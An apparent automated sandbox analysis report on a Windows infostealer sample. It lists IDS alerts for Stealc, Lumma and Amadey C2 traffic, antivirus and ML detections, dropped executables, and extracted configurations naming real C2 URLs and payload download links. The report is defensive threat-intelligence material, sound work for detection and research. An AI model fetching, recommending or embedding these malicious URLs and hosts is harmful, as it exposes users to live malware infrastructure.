2024-11-22T20:36:49.309883+0100	2054350	1	A Network Trojan was detected	192.168.2.4	49896	34.116.198.130	80	TCP
2024-11-22T20:36:51.216120+0100	2054350	1	A Network Trojan was detected	192.168.2.4	49906	34.116.198.130	80	TCP
2024-11-22T20:37:02.662426+0100	2054350	1	A Network Trojan was detected	192.168.2.4	49947	34.116.198.130	80	TCP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T20:35:04.535867+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.4	49730	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T20:35:04.410955+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T20:35:04.855737+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T20:35:06.417034+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T20:35:04.977868+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.4	49730	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T20:36:47.643561+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49885	172.67.162.84	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T20:35:03.968551+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-22T20:36:41.433205+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49870	185.215.113.206	80	TCP
2024-11-22T20:36:58.191722+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49926	185.215.113.206	80	TCP
2024-11-22T20:37:27.240162+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50033	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T20:36:06.094921+0100	2856147	1	A Network Trojan was detected	192.168.2.4	49782	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T20:36:21.027800+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	49789	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T20:36:10.680927+0100	2803305	3	Unknown Traffic	192.168.2.4	49794	31.41.244.11	80	TCP
2024-11-22T20:36:24.073232+0100	2803305	3	Unknown Traffic	192.168.2.4	49823	185.215.113.16	80	TCP
2024-11-22T20:36:32.963251+0100	2803305	3	Unknown Traffic	192.168.2.4	49846	185.215.113.16	80	TCP
2024-11-22T20:36:41.492658+0100	2803305	3	Unknown Traffic	192.168.2.4	49872	185.215.113.16	80	TCP
2024-11-22T20:36:48.799280+0100	2803305	3	Unknown Traffic	192.168.2.4	49892	185.215.113.16	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T20:35:07.118820+0100	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-22T20:35:22.342340+0100	2803304	3	Unknown Traffic	192.168.2.4	49750	185.215.113.206	80	TCP
2024-11-22T20:35:24.268920+0100	2803304	3	Unknown Traffic	192.168.2.4	49750	185.215.113.206	80	TCP
2024-11-22T20:35:25.685751+0100	2803304	3	Unknown Traffic	192.168.2.4	49750	185.215.113.206	80	TCP
2024-11-22T20:35:26.837640+0100	2803304	3	Unknown Traffic	192.168.2.4	49750	185.215.113.206	80	TCP
2024-11-22T20:35:30.436139+0100	2803304	3	Unknown Traffic	192.168.2.4	49750	185.215.113.206	80	TCP
2024-11-22T20:35:31.513119+0100	2803304	3	Unknown Traffic	192.168.2.4	49750	185.215.113.206	80	TCP
2024-11-22T20:35:37.139508+0100	2803304	3	Unknown Traffic	192.168.2.4	49759	185.215.113.16	80	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T20:37:11.576116+0100	2843864	1	A Network Trojan was detected	192.168.2.4	49983	172.67.162.84	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.206/c4becf79229cb002.phpHu8	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpR%	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php8254001	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/K	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpN_)	Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/rnd.exe	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/mozglue.dll_	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000009.00000002.2158334223.0000000000821000.00000040.00000001.01000000.0000000B.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 00000000.00000002.2129788119.000000000074E000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: 0718eb7837.exe.6588.14.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	ReversingLabs: Detection: 42%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6C5BA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B4440 PK11_PrivDecrypt,	0_2_6C5B4440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C584420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6C584420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B44C0 PK11_PubEncrypt,	0_2_6C5B44C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6025B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6C6025B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	0_2_6C5BA650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C598670 PK11_ExportEncryptedPrivKeyInfo,	0_2_6C598670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C59E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6C59E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	0_2_6C5DA730
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	0_2_6C5E0180
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B43B0 PK11_PubEncryptPKCS1,PR_SetError,	0_2_6C5B43B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	0_2_6C5D7C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C597D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	0_2_6C597D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	0_2_6C5DBD30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	0_2_6C5D9EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B3FF0 PK11_PrivDecryptPKCS1,	0_2_6C5B3FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	0_2_6C5B3850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	0_2_6C5B9840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DDA40 SEC_PKCS7ContentIsEncrypted,	0_2_6C5DDA40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B3560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	0_2_6C5B3560

Source: fa55e7c5ed.exe, 0000000D.00000003.2504178943.0000000007B32000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_b6ad1a30-e

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49878 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49885 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49893 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49902 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49912 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49912 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49921 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49928 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49941 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49956 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49981 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49983 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49991 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49993 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49998 version: TLS 1.2

Source:	Binary string: UxTheme.pdb source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: rsaenh.pdb source: firefox.exe, 00000031.00000002.3374809913.0000024F746EB000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: ktmw32.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WscApi.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: dbghelp.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msvcrt.pdb source: firefox.exe, 00000031.00000002.3369787551.0000024F73D92000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8WinTypes.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: pnrpnsp.pdbh source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: xul.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: nssckbi.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2157778162.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: cryptsp.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3374809913.0000024F746EB000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8softokn3.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: profapi.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntmarta.pdb@ source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: shell32.pdbXULBroadcastManager source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: CLBCatQ.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: urlmon.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8twinapi.appcore.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8kernelbase.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: shlwapi.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: UxTheme.pdb@ source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8CoreMessaging.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: win32u.pdb source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3369787551.0000024F73D92000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: CLBCatQ.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8bcryptprimitives.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: pnrpnsp.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: srvcli.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: imm32.pdb source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: freebl3.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ws2_32.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: version.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mswsock.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8gkcodecs.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8iphlpapi.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708E4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8ExplorerFrame.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3359262332.0000024F7132B000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: nsi.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: winmm.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 2aff342b40.exe, 00000023.00000003.2855859321.00000000049E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ole32.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8osclientcerts.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8CoreUIComponents.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8cryptbase.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msasn1.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: combase.pdb source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: shlwapi.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8msvcp140.amd64.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmp, firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ncrypt.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8webauthn.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708E4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8Kernel.Appcore.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8powrprof.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: NapiNSP.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8MMDevAPI.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2157778162.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: wininet.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8kernel32.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8oleaut32.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: combase.pdb@ source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: rpcrt4.pdb source: firefox.exe, 00000031.00000002.3369787551.0000024F73D92000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8TextInputFramework.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wshbth.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8InputHost.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
